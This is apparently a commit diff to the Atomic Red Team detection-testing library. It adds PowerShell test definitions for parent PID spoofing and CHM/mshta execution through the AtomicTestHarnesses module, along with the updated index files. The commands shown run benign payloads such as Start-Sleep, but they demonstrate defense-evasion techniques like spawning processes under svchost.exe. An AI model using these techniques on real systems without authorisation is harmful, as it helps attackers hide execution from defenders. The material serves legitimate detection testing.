Introducing AtomicTestHarnesses Tests to ART (#1270)

* Introduce AtomicTestHarness Tests to ART Adding: - T1134.004 - Access Token Manipulation: Parent PID Spoofing - T1218.001 - Signed Binary Proxy Execution: Compiled HTML File - T1218.005 - Signed Binary Proxy Execution: Mshta These tests utilize the recently released [AtomicTestHarnesses](https://github.com/redcanaryco/atomictestharnesses) to simulate the base tests from from each ATH Harness. Input arguments may be manipulated as needed to enhance simulation. * Generate docs from job=validate_atomics_generate_docs branch=atomictestharness-tests Co-authored-by: CircleCI Atomic Red Team doc generator <email>
2020-10-22 14:34:31 -06:00
parent 7a1c4e857b
commit c8f43265c7
12 changed files with 1828 additions and 0 deletions
@@ -38,6 +38,10 @@ privilege-escalation,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de
 privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 privilege-escalation,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 privilege-escalation,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
 privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
 privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
 privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
@@ -245,6 +249,11 @@ defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using
 defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
 defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
 defense-evasion,T1218.001,Compiled HTML File,2,Compiled HTML Help Remote Payload,0f8af516-9818-4172-922b-42986ef1e81d,command_prompt
+defense-evasion,T1218.001,Compiled HTML File,3,Invoke CHM with default Shortcut Command Execution,29d6f0d7-be63-4482-8827-ea77126c1ef7,powershell
+defense-evasion,T1218.001,Compiled HTML File,4,Invoke CHM with InfoTech Storage Protocol Handler,b4094750-5fc7-4e8e-af12-b4e36bf5e7f6,powershell
+defense-evasion,T1218.001,Compiled HTML File,5,Invoke CHM Simulate Double click,5decef42-92b8-4a93-9eb2-877ddcb9401a,powershell
+defense-evasion,T1218.001,Compiled HTML File,6,Invoke CHM with Script Engine and Help Topic,4f83adda-f5ec-406d-b318-9773c9ca92e5,powershell
+defense-evasion,T1218.001,Compiled HTML File,7,Invoke CHM Shortcut Command with ITS and Help Topic,15756147-7470-4a83-87fb-bb5662526247,powershell
 defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
 defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
@@ -339,6 +348,12 @@ defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-483
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
+defense-evasion,T1218.005,Mshta,4,Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement,007e5672-2088-4853-a562-7490ddc19447,powershell
+defense-evasion,T1218.005,Mshta,5,Invoke HTML Application - Jscript Engine Simulating Double Click,58a193ec-131b-404e-b1ca-b35cf0b18c33,powershell
+defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from URI,39ceed55-f653-48ac-bd19-aceceaf525db,powershell
+defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell
+defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
+defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
 defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt
 defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt
 defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt
@@ -355,6 +370,10 @@ defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded P
 defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
 defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
 defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
 defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
 defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
 defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
@@ -25,6 +25,10 @@ privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Glo
 privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 privilege-escalation,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 privilege-escalation,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
 privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
 privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
 privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
@@ -74,6 +78,11 @@ defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using
 defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
 defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
 defense-evasion,T1218.001,Compiled HTML File,2,Compiled HTML Help Remote Payload,0f8af516-9818-4172-922b-42986ef1e81d,command_prompt
+defense-evasion,T1218.001,Compiled HTML File,3,Invoke CHM with default Shortcut Command Execution,29d6f0d7-be63-4482-8827-ea77126c1ef7,powershell
+defense-evasion,T1218.001,Compiled HTML File,4,Invoke CHM with InfoTech Storage Protocol Handler,b4094750-5fc7-4e8e-af12-b4e36bf5e7f6,powershell
+defense-evasion,T1218.001,Compiled HTML File,5,Invoke CHM Simulate Double click,5decef42-92b8-4a93-9eb2-877ddcb9401a,powershell
+defense-evasion,T1218.001,Compiled HTML File,6,Invoke CHM with Script Engine and Help Topic,4f83adda-f5ec-406d-b318-9773c9ca92e5,powershell
+defense-evasion,T1218.001,Compiled HTML File,7,Invoke CHM Shortcut Command with ITS and Help Topic,15756147-7470-4a83-87fb-bb5662526247,powershell
 defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
 defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
@@ -132,6 +141,12 @@ defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-483
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
+defense-evasion,T1218.005,Mshta,4,Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement,007e5672-2088-4853-a562-7490ddc19447,powershell
+defense-evasion,T1218.005,Mshta,5,Invoke HTML Application - Jscript Engine Simulating Double Click,58a193ec-131b-404e-b1ca-b35cf0b18c33,powershell
+defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from URI,39ceed55-f653-48ac-bd19-aceceaf525db,powershell
+defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell
+defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
+defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
 defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt
 defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt
 defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt
@@ -147,6 +162,10 @@ defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded P
 defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
 defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
 defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
 defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
 defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
 defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
@@ -89,6 +89,10 @@
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
  - Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
+  - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
+  - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
+  - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
+  - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
 - T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -499,6 +503,11 @@
 - [T1218.001 Compiled HTML File](../../T1218.001/T1218.001.md)
  - Atomic Test #1: Compiled HTML Help Local Payload [windows]
  - Atomic Test #2: Compiled HTML Help Remote Payload [windows]
+  - Atomic Test #3: Invoke CHM with default Shortcut Command Execution [windows]
+  - Atomic Test #4: Invoke CHM with InfoTech Storage Protocol Handler [windows]
+  - Atomic Test #5: Invoke CHM Simulate Double click [windows]
+  - Atomic Test #6: Invoke CHM with Script Engine and Help Topic [windows]
+  - Atomic Test #7: Invoke CHM Shortcut Command with ITS and Help Topic [windows]
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1218.002 Control Panel](../../T1218.002/T1218.002.md)
  - Atomic Test #1: Control Panel Items [windows]
@@ -650,6 +659,12 @@
  - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
  - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
  - Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows]
+  - Atomic Test #4: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement [windows]
+  - Atomic Test #5: Invoke HTML Application - Jscript Engine Simulating Double Click [windows]
+  - Atomic Test #6: Invoke HTML Application - Direct download from URI [windows]
+  - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows]
+  - Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows]
+  - Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows]
 - [T1218.007 Msiexec](../../T1218.007/T1218.007.md)
  - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows]
  - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows]
@@ -672,6 +687,10 @@
  - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
 - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
  - Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
+  - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
+  - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
+  - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
+  - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
 - [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md)
  - Atomic Test #1: Mimikatz Pass the Hash [windows]
  - Atomic Test #2: crackmapexec Pass the Hash [windows]
@@ -62,6 +62,10 @@
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
  - Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
+  - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
+  - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
+  - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
+  - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
 - T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -153,6 +157,11 @@
 - [T1218.001 Compiled HTML File](../../T1218.001/T1218.001.md)
  - Atomic Test #1: Compiled HTML Help Local Payload [windows]
  - Atomic Test #2: Compiled HTML Help Remote Payload [windows]
+  - Atomic Test #3: Invoke CHM with default Shortcut Command Execution [windows]
+  - Atomic Test #4: Invoke CHM with InfoTech Storage Protocol Handler [windows]
+  - Atomic Test #5: Invoke CHM Simulate Double click [windows]
+  - Atomic Test #6: Invoke CHM with Script Engine and Help Topic [windows]
+  - Atomic Test #7: Invoke CHM Shortcut Command with ITS and Help Topic [windows]
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1218.002 Control Panel](../../T1218.002/T1218.002.md)
  - Atomic Test #1: Control Panel Items [windows]
@@ -255,6 +264,12 @@
  - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
  - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
  - Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows]
+  - Atomic Test #4: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement [windows]
+  - Atomic Test #5: Invoke HTML Application - Jscript Engine Simulating Double Click [windows]
+  - Atomic Test #6: Invoke HTML Application - Direct download from URI [windows]
+  - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows]
+  - Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows]
+  - Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows]
 - [T1218.007 Msiexec](../../T1218.007/T1218.007.md)
  - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows]
  - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows]
@@ -276,6 +291,10 @@
  - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
 - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
  - Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
+  - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
+  - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
+  - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
+  - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
 - [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md)
  - Atomic Test #1: Mimikatz Pass the Hash [windows]
  - Atomic Test #2: crackmapexec Pass the Hash [windows]
@@ -4496,6 +4496,134 @@ privilege-escalation:
          Stop-Process -Name "#{dll_process_name}" -ErrorAction Ignore
          Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
        name: powershell
+    - name: Parent PID Spoofing - Spawn from Current Process
+      auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25
+      description: Spawns a powershell.exe process as a child of the current process.
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_path:
+          description: File path or name of process to spawn
+          type: path
+          default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+        parent_pid:
+          description: PID of process to spawn from
+          type: string
+          default: "$PID"
+        command_line:
+          description: Specified command line to use
+          type: string
+          default: "-Command Start-Sleep 10"
+      dependencies:
+      - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+          must be exported in the module.
+        prereq_command: |-
+          $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+        get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+          -Force
+
+'
+      executor:
+        command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine
+          ''#{command_line}'' -ParentId #{parent_pid}'
+        name: powershell
+    - name: Parent PID Spoofing - Spawn from Specified Process
+      auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb
+      description: Spawns a notepad.exe process as a child of the current process.
+      supported_platforms:
+      - windows
+      input_arguments:
+        parent_pid:
+          description: PID of process to spawn from
+          type: string
+          default: "$PID"
+        test_guid:
+          description: Defined test GUID
+          type: string
+          default: 12345678-1234-1234-1234-123456789123
+      dependencies:
+      - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+          must be exported in the module.
+        prereq_command: |-
+          $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+        get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+          -Force
+
+'
+      executor:
+        command: 'Start-ATHProcessUnderSpecificParent  -ParentId #{parent_pid} -TestGuid
+          #{test_guid}'
+        name: powershell
+    - name: Parent PID Spoofing - Spawn from svchost.exe
+      auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591
+      description: Spawnd a process as a child of the first accessible svchost.exe
+        process.
+      supported_platforms:
+      - windows
+      input_arguments:
+        command_line:
+          description: Specified command line to use
+          type: string
+          default: "-Command Start-Sleep 10"
+        file_path:
+          description: File path or name of process to spawn
+          type: path
+          default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+      dependencies:
+      - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+          must be exported in the module.
+        prereq_command: |-
+          $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+        get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+          -Force
+
+'
+      executor:
+        command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine,
+          ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" |
+          Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path}
+          -CommandLine ''#{command_line}'''
+        name: powershell
+    - name: Parent PID Spoofing - Spawn from New Process
+      auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db
+      description: Creates a notepad.exe process and then spawns a powershell.exe
+        process as a child of it.
+      supported_platforms:
+      - windows
+      input_arguments:
+        command_line:
+          description: Specified command line to use
+          type: string
+          default: "-Command Start-Sleep 10"
+        file_path:
+          description: File path or name of process to spawn
+          type: path
+          default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+        parent_name:
+          description: Parent process to spoof from
+          type: path
+          default: "$Env:windir\\System32\\notepad.exe"
+      dependencies:
+      - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+          must be exported in the module.
+        prereq_command: |-
+          $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+        get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+          -Force
+
+'
+      executor:
+        command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent
+          -FilePath #{file_path} -CommandLine ''#{command_line}'''
+        name: powershell
  T1034:
    technique:
      id: attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02
@@ -22968,6 +23096,174 @@ defense-evasion:

 '
        name: command_prompt
+    - name: Invoke CHM with default Shortcut Command Execution
+      auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7
+      description: Executes a CHM file with the default Shortcut Command method.
+      supported_platforms:
+      - windows
+      input_arguments:
+        chm_file_path:
+          description: Default path of CHM
+          type: string
+          default: Test.chm
+        hh_file_path:
+          description: path of modified HH.exe
+          type: path
+          default: "$env:windir\\hh.exe"
+      dependencies:
+      - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp
+          must be exported in the module.
+        prereq_command: |-
+          $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+        get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+          -Force
+
+'
+      executor:
+        command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath
+          #{chm_file_path}'
+        name: powershell
+    - name: Invoke CHM with InfoTech Storage Protocol Handler
+      auto_generated_guid: b4094750-5fc7-4e8e-af12-b4e36bf5e7f6
+      description: Executes a CHM file with the ITS protocol handler.
+      supported_platforms:
+      - windows
+      input_arguments:
+        hh_file_path:
+          description: path of modified HH.exe
+          type: path
+          default: "$env:windir\\hh.exe"
+        infotech_storage_handler:
+          description: Default InfoTech Storage Protocol Handler
+          type: string
+          default: its
+        chm_file_path:
+          description: Default path of CHM
+          type: string
+          default: Test.chm
+      dependencies:
+      - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp
+          must be exported in the module.
+        prereq_command: |-
+          $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+        get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+          -Force
+
+'
+      executor:
+        command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler}
+          -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
+        name: powershell
+    - name: Invoke CHM Simulate Double click
+      auto_generated_guid: 5decef42-92b8-4a93-9eb2-877ddcb9401a
+      description: Executes a CHM file simulating a user double click.
+      supported_platforms:
+      - windows
+      input_arguments:
+        chm_file_path:
+          description: Default path of CHM
+          type: string
+          default: Test.chm
+      dependencies:
+      - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp
+          must be exported in the module.
+        prereq_command: |-
+          $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+        get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+          -Force
+
+'
+      executor:
+        command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}'
+        name: powershell
+    - name: Invoke CHM with Script Engine and Help Topic
+      auto_generated_guid: 4f83adda-f5ec-406d-b318-9773c9ca92e5
+      description: Executes a CHM file with a defined script engine, ITS Protocol
+        Handler, and help topic extension.
+      supported_platforms:
+      - windows
+      input_arguments:
+        topic_extension:
+          description: Default Help Topic
+          type: string
+          default: html
+        hh_file_path:
+          description: path of modified HH.exe
+          type: path
+          default: "$env:windir\\hh.exe"
+        infotech_storage_handler:
+          description: Default InfoTech Storage Protocol Handler
+          type: string
